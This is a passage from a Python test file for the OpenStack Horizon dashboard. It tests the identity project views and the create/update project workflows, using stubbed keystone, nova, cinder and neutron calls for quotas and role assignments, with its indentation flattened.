# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import logging
import os
import django
from django.core.urlresolvers import reverse
from django import http
from django.test.utils import override_settings
from django.utils import timezone
from django.utils import unittest
from mox import IgnoreArg # noqa
from mox import IsA # noqa
from horizon import exceptions
from horizon.workflows import views
from openstack_dashboard import api
from openstack_dashboard.dashboards.identity.projects import workflows
from openstack_dashboard import policy_backend
from openstack_dashboard.test import helpers as test
from openstack_dashboard import usage
from openstack_dashboard.usage import quotas
with_sel = os.environ.get('WITH_SELENIUM', False)
if with_sel:
from selenium.webdriver import ActionChains # noqa
from selenium.webdriver.common import keys
from socket import timeout as socket_timeout # noqa
INDEX_URL = reverse('horizon:identity:projects:index')
USER_ROLE_PREFIX = workflows.PROJECT_USER_MEMBER_SLUG + "_role_"
GROUP_ROLE_PREFIX = workflows.PROJECT_GROUP_MEMBER_SLUG + "_role_"
PROJECT_DETAIL_URL = reverse('horizon:identity:projects:detail', args=[1])
class TenantsViewTests(test.BaseAdminViewTests):
@test.create_stubs({api.keystone: ('tenant_list',)})
def test_index(self):
api.keystone.tenant_list(IsA(http.HttpRequest),
domain=None,
paginate=True,
marker=None) \
.AndReturn([self.tenants.list(), False])
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'identity/projects/index.html')
self.assertItemsEqual(res.context['table'].data, self.tenants.list())
@test.create_stubs({api.keystone: ('tenant_list', )})
def test_index_with_domain_context(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
domain_tenants = [tenant for tenant in self.tenants.list()
if tenant.domain_id == domain.id]
api.keystone.tenant_list(IsA(http.HttpRequest),
domain=domain.id,
paginate=True,
marker=None) \
.AndReturn([domain_tenants, False])
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'identity/projects/index.html')
self.assertItemsEqual(res.context['table'].data, domain_tenants)
self.assertContains(res, "<em>test_domain:</em>")
class ProjectsViewNonAdminTests(test.TestCase):
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
@test.create_stubs({api.keystone: ('tenant_list',)})
def test_index(self):
api.keystone.tenant_list(IsA(http.HttpRequest),
user=self.user.id,
paginate=True,
marker=None,
admin=False) \
.AndReturn([self.tenants.list(), False])
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'identity/projects/index.html')
self.assertItemsEqual(res.context['table'].data, self.tenants.list())
class CreateProjectWorkflowTests(test.BaseAdminViewTests):
def _get_project_info(self, project):
domain = self._get_default_domain()
project_info = {"name": project.name,
"description": project.description,
"enabled": project.enabled,
"domain": domain.id}
return project_info
def _get_workflow_fields(self, project):
domain = self._get_default_domain()
project_info = {"domain_id": domain.id,
"domain_name": domain.name,
"name": project.name,
"description": project.description,
"enabled": project.enabled}
return project_info
def _get_quota_info(self, quota):
cinder_quota = self.cinder_quotas.first()
neutron_quota = self.neutron_quotas.first()
quota_data = {}
for field in quotas.NOVA_QUOTA_FIELDS:
quota_data[field] = int(quota.get(field).limit)
for field in quotas.CINDER_QUOTA_FIELDS:
quota_data[field] = int(cinder_quota.get(field).limit)
for field in quotas.NEUTRON_QUOTA_FIELDS:
quota_data[field] = int(neutron_quota.get(field).limit)
return quota_data
def _get_workflow_data(self, project, quota):
project_info = self._get_workflow_fields(project)
quota_data = self._get_quota_info(quota)
project_info.update(quota_data)
return project_info
def _get_default_domain(self):
default_domain = self.domain
domain = {"id": self.request.session.get('domain_context',
default_domain.id),
"name": self.request.session.get('domain_context_name',
default_domain.name)}
return api.base.APIDictWrapper(domain)
def _get_all_users(self, domain_id):
if not domain_id:
users = self.users.list()
else:
users = [user for user in self.users.list()
if user.domain_id == domain_id]
return users
def _get_all_groups(self, domain_id):
if not domain_id:
groups = self.groups.list()
else:
groups = [group for group in self.groups.list()
if group.domain_id == domain_id]
return groups
@test.create_stubs({api.keystone: ('get_default_domain',
'get_default_role',
'user_list',
'group_list',
'role_list'),
api.base: ('is_service_enabled',),
api.neutron: ('is_extension_supported',),
quotas: ('get_default_quota_data',)})
def test_add_project_get(self):
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.base.is_service_enabled(IsA(http.HttpRequest), 'network') \
.MultipleTimes().AndReturn(True)
api.base.is_service_enabled(IsA(http.HttpRequest), 'volume') \
.MultipleTimes().AndReturn(True)
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'security-group').AndReturn(True)
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)).AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
api.keystone.role_list(IsA(http.HttpRequest)).AndReturn(roles)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:create')
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
self.assertContains(res, '<input type="hidden" name="subnet" '
'id="id_subnet" />', html=True)
workflow = res.context['workflow']
self.assertEqual(res.context['workflow'].name,
workflows.CreateProject.name)
step = workflow.get_step("createprojectinfoaction")
self.assertEqual(step.action.initial['ram'], quota.get('ram').limit)
self.assertEqual(step.action.initial['injected_files'],
quota.get('injected_files').limit)
self.assertQuerysetEqual(
workflow.steps,
['<CreateProjectInfo: createprojectinfoaction>',
'<UpdateProjectMembers: update_members>',
'<UpdateProjectGroups: update_group_members>',
'<CreateProjectQuota: create_quotas>'])
def test_add_project_get_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_get()
@test.create_stubs({api.keystone: ('get_default_role',
'user_list',
'group_list',
'role_list',
'domain_get'),
api.neutron: ('is_extension_supported',
'tenant_quota_get'),
quotas: ('get_default_quota_data',)})
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_add_project_get_with_neutron(self):
quota = self.quotas.first()
neutron_quotas = self.neutron_quotas.first()
quotas.get_default_quota_data(IsA(http.HttpRequest)) \
.AndReturn(quota)
api.neutron.is_extension_supported(IsA(http.HttpRequest), 'quotas') \
.MultipleTimes().AndReturn(True)
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'security-group').AndReturn(True)
api.neutron.tenant_quota_get(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(neutron_quotas)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(self.roles.first())
api.keystone.user_list(IsA(http.HttpRequest), domain=None) \
.AndReturn(self.users.list())
api.keystone.role_list(IsA(http.HttpRequest)) \
.AndReturn(self.roles.list())
api.keystone.group_list(IsA(http.HttpRequest), domain=None) \
.AndReturn(self.groups.list())
api.keystone.role_list(IsA(http.HttpRequest)) \
.AndReturn(self.roles.list())
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:identity:projects:create'))
self.assertTemplateUsed(res, views.WorkflowView.template_name)
if django.VERSION >= (1, 6):
self.assertContains(res, '''
<input class="form-control"
id="id_subnet" min="-1"
name="subnet" type="number" value="10" />
''', html=True)
else:
self.assertContains(res, '''
<input class="form-control"
name="subnet" id="id_subnet"
value="10" type="text" />
''', html=True)
workflow = res.context['workflow']
self.assertEqual(res.context['workflow'].name,
workflows.CreateProject.name)
step = workflow.get_step("createprojectinfoaction")
self.assertEqual(step.action.initial['ram'], quota.get('ram').limit)
self.assertEqual(step.action.initial['subnet'],
neutron_quotas.get('subnet').limit)
@test.create_stubs({api.keystone: ('get_default_role',
'add_tenant_user_role',
'tenant_create',
'user_list',
'group_list',
'role_list',
'domain_get'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages',),
api.cinder: ('tenant_quota_update',),
api.nova: ('tenant_quota_update',)})
def test_add_project_post(self, neutron=False):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
if neutron:
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
# handle
project_details = self._get_project_info(project)
quota_data = self._get_quota_info(quota)
api.keystone.tenant_create(IsA(http.HttpRequest), **project_details) \
.AndReturn(project)
workflow_data = {}
for role in roles:
if USER_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[USER_ROLE_PREFIX + role.id]
for user_id in ulist:
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user=user_id,
role=role.id)
for role in roles:
if GROUP_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[GROUP_ROLE_PREFIX + role.id]
for group_id in ulist:
api.keystone.add_group_role(IsA(http.HttpRequest),
role=role.id,
group=group_id,
project=self.tenant.id)
nova_updated_quota = dict([(key, quota_data[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota)
cinder_updated_quota = dict([(key, quota_data[key]) for key in
quotas.CINDER_QUOTA_FIELDS])
api.cinder.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**cinder_updated_quota)
self.mox.ReplayAll()
workflow_data.update(self._get_workflow_data(project, quota))
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_add_project_post_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_post()
@test.create_stubs({api.neutron: ('is_extension_supported',
'tenant_quota_update')})
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_add_project_post_with_neutron(self):
quota_data = self.neutron_quotas.first()
neutron_updated_quota = dict([(key, quota_data.get(key).limit)
for key in quotas.NEUTRON_QUOTA_FIELDS])
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'security-group').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest), 'quotas') \
.MultipleTimes().AndReturn(True)
api.neutron.tenant_quota_update(IsA(http.HttpRequest),
self.tenant.id,
**neutron_updated_quota)
self.test_add_project_post(neutron=True)
@test.create_stubs({api.keystone: ('user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas')})
def test_add_project_quota_defaults_error(self):
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)) \
.AndRaise(self.exceptions.nova)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:create')
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
self.assertContains(res, "Unable to retrieve default quota values")
def test_add_project_quota_defaults_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_quota_defaults_error()
@test.create_stubs({api.keystone: ('tenant_create',
'user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages')})
def test_add_project_tenant_create_error(self):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
# handle
project_details = self._get_project_info(project)
api.keystone.tenant_create(IsA(http.HttpRequest), **project_details) \
.AndRaise(self.exceptions.keystone)
self.mox.ReplayAll()
workflow_data = self._get_workflow_data(project, quota)
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_add_project_tenant_create_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_tenant_create_error()
@test.create_stubs({api.keystone: ('tenant_create',
'user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role',
'add_tenant_user_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages'),
api.nova: ('tenant_quota_update',)})
def test_add_project_quota_update_error(self):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
# handle
project_details = self._get_project_info(project)
quota_data = self._get_quota_info(quota)
api.keystone.tenant_create(IsA(http.HttpRequest), **project_details) \
.AndReturn(project)
workflow_data = {}
for role in roles:
if USER_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[USER_ROLE_PREFIX + role.id]
for user_id in ulist:
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user=user_id,
role=role.id)
for role in roles:
if GROUP_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[GROUP_ROLE_PREFIX + role.id]
for group_id in ulist:
api.keystone.add_group_role(IsA(http.HttpRequest),
role=role.id,
group=group_id,
project=self.tenant.id)
nova_updated_quota = dict([(key, quota_data[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota) \
.AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
workflow_data.update(self._get_workflow_data(project, quota))
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_add_project_quota_update_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_quota_update_error()
@test.create_stubs({api.keystone: ('tenant_create',
'user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role',
'add_tenant_user_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages'),
api.cinder: ('tenant_quota_update',),
api.nova: ('tenant_quota_update',)})
def test_add_project_user_update_error(self):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
# handle
project_details = self._get_project_info(project)
quota_data = self._get_quota_info(quota)
api.keystone.tenant_create(IsA(http.HttpRequest), **project_details) \
.AndReturn(project)
workflow_data = {}
for role in roles:
if USER_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[USER_ROLE_PREFIX + role.id]
for user_id in ulist:
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user=user_id,
role=role.id) \
.AndRaise(self.exceptions.keystone)
break
break
nova_updated_quota = dict([(key, quota_data[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota)
cinder_updated_quota = dict([(key, quota_data[key]) for key in
quotas.CINDER_QUOTA_FIELDS])
api.cinder.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**cinder_updated_quota)
self.mox.ReplayAll()
workflow_data.update(self._get_workflow_data(project, quota))
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_add_project_user_update_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_user_update_error()
@test.create_stubs({api.keystone: ('user_list',
'role_list',
'group_list',
'get_default_domain',
'get_default_role'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages')})
def test_add_project_missing_field_error(self):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
self.mox.ReplayAll()
workflow_data = self._get_workflow_data(project, quota)
workflow_data["name"] = ""
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertContains(res, "field is required")
def test_add_project_missing_field_error_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_missing_field_error()
class UpdateProjectWorkflowTests(test.BaseAdminViewTests):
def _get_quota_info(self, quota):
cinder_quota = self.cinder_quotas.first()
neutron_quota = self.neutron_quotas.first()
quota_data = {}
for field in quotas.NOVA_QUOTA_FIELDS:
quota_data[field] = int(quota.get(field).limit)
for field in quotas.CINDER_QUOTA_FIELDS:
quota_data[field] = int(cinder_quota.get(field).limit)
for field in quotas.NEUTRON_QUOTA_FIELDS:
quota_data[field] = int(neutron_quota.get(field).limit)
return quota_data
def _get_all_users(self, domain_id):
if not domain_id:
users = self.users.list()
else:
users = [user for user in self.users.list()
if user.domain_id == domain_id]
return users
def _get_all_groups(self, domain_id):
if not domain_id:
groups = self.groups.list()
else:
groups = [group for group in self.groups.list()
if group.domain_id == domain_id]
return groups
def _get_proj_users(self, project_id):
return [user for user in self.users.list()
if user.project_id == project_id]
def _get_proj_groups(self, project_id):
return [group for group in self.groups.list()
if group.project_id == project_id]
def _get_proj_role_assignment(self, project_id):
project_scope = {'project': {'id': project_id}}
return self.role_assignments.filter(scope=project_scope)
def _check_role_list(self, keystone_api_version, role_assignments, groups,
proj_users, roles, workflow_data):
if keystone_api_version >= 3:
            # admin role; attempting to remove the current admin results in
            # a warning message
workflow_data[USER_ROLE_PREFIX + "1"] = ['3']
# member role
workflow_data[USER_ROLE_PREFIX + "2"] = ['1', '3']
# admin role
workflow_data[GROUP_ROLE_PREFIX + "1"] = ['2', '3']
# member role
workflow_data[GROUP_ROLE_PREFIX + "2"] = ['1', '2', '3']
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
# Give user 1 role 2
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user='1',
role='2',)
# remove role 2 from user 2
api.keystone.remove_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user='2',
role='2')
# Give user 3 role 1
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user='3',
role='1',)
api.keystone.group_list(IsA(http.HttpRequest),
domain=self.domain.id,
project=self.tenant.id) \
.AndReturn(groups)
api.keystone.roles_for_group(IsA(http.HttpRequest),
group='1',
project=self.tenant.id) \
.AndReturn(roles)
api.keystone.remove_group_role(IsA(http.HttpRequest),
project=self.tenant.id,
group='1',
role='1')
api.keystone.roles_for_group(IsA(http.HttpRequest),
group='2',
project=self.tenant.id) \
.AndReturn(roles)
api.keystone.roles_for_group(IsA(http.HttpRequest),
group='3',
project=self.tenant.id) \
.AndReturn(roles)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
# admin user - try to remove all roles on current project, warning
api.keystone.roles_for_user(IsA(http.HttpRequest), '1',
self.tenant.id).AndReturn(roles)
# member user 1 - has role 1, will remove it
api.keystone.roles_for_user(IsA(http.HttpRequest), '2',
self.tenant.id).AndReturn((roles[1],))
# member user 3 - has role 2
api.keystone.roles_for_user(IsA(http.HttpRequest), '3',
self.tenant.id).AndReturn((roles[0],))
# add role 2
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user='3',
role='2')\
.AndRaise(self.exceptions.keystone)
@test.create_stubs({api.keystone: ('get_default_role',
'roles_for_user',
'tenant_get',
'domain_get',
'user_list',
'roles_for_group',
'group_list',
'role_list',
'role_assignments_list'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas')})
def test_update_project_get(self):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
proj_users = self._get_proj_users(project.id)
role_assignments = self._get_proj_role_assignment(project.id)
api.keystone.tenant_get(IsA(http.HttpRequest),
self.tenant.id, admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
workflow = res.context['workflow']
self.assertEqual(res.context['workflow'].name,
workflows.UpdateProject.name)
step = workflow.get_step("update_info")
self.assertEqual(step.action.initial['ram'], quota.get('ram').limit)
self.assertEqual(step.action.initial['injected_files'],
quota.get('injected_files').limit)
self.assertEqual(step.action.initial['name'], project.name)
self.assertEqual(step.action.initial['description'],
project.description)
self.assertQuerysetEqual(
workflow.steps,
['<UpdateProjectInfo: update_info>',
'<UpdateProjectMembers: update_members>',
'<UpdateProjectGroups: update_group_members>',
'<UpdateProjectQuota: update_quotas>'])
@test.create_stubs({api.keystone: ('tenant_get',
'domain_get',
'tenant_update',
'get_default_role',
'roles_for_user',
'remove_tenant_user_role',
'add_tenant_user_role',
'user_list',
'roles_for_group',
'remove_group_role',
'add_group_role',
'group_list',
'role_list',
'role_assignments_list'),
api.nova: ('tenant_quota_update',),
api.cinder: ('tenant_quota_update',),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas',
'tenant_quota_usages')})
def test_update_project_save(self, neutron=False):
keystone_api_version = api.keystone.VERSIONS.active
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
domain_id = project.domain_id
users = self._get_all_users(domain_id)
proj_users = self._get_proj_users(project.id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
role_assignments = self._get_proj_role_assignment(project.id)
quota_usages = self.quota_usages.first()
# get/init
api.keystone.tenant_get(IsA(http.HttpRequest),
self.tenant.id, admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
if neutron:
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
workflow_data = {}
if keystone_api_version >= 3:
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
else:
api.keystone.user_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(proj_users)
for user in proj_users:
api.keystone.roles_for_user(IsA(http.HttpRequest),
user.id,
self.tenant.id).AndReturn(roles)
api.keystone.role_assignments_list(IsA(http.HttpRequest),
project=self.tenant.id) \
.AndReturn(role_assignments)
workflow_data[USER_ROLE_PREFIX + "1"] = ['3'] # admin role
workflow_data[USER_ROLE_PREFIX + "2"] = ['2'] # member role
# Group assignment form data
workflow_data[GROUP_ROLE_PREFIX + "1"] = ['3'] # admin role
workflow_data[GROUP_ROLE_PREFIX + "2"] = ['2'] # member role
# update some fields
project._info["domain_id"] = domain_id
project._info["name"] = "updated name"
project._info["description"] = "updated description"
quota.metadata_items = 444
quota.volumes = 444
updated_project = {"name": project._info["name"],
"description": project._info["description"],
"enabled": project.enabled}
updated_quota = self._get_quota_info(quota)
# handle
api.keystone.tenant_update(IsA(http.HttpRequest),
project.id,
**updated_project) \
.AndReturn(project)
self._check_role_list(keystone_api_version, role_assignments, groups,
proj_users, roles, workflow_data)
quotas.tenant_quota_usages(IsA(http.HttpRequest), tenant_id=project.id) \
.AndReturn(quota_usages)
nova_updated_quota = dict([(key, updated_quota[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota)
cinder_updated_quota = dict([(key, updated_quota[key]) for key in
quotas.CINDER_QUOTA_FIELDS])
api.cinder.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**cinder_updated_quota)
self.mox.ReplayAll()
# submit form data
project_data = {"domain_id": project._info["domain_id"],
"name": project._info["name"],
"id": project.id,
"description": project._info["description"],
"enabled": project.enabled}
workflow_data.update(project_data)
workflow_data.update(updated_quota)
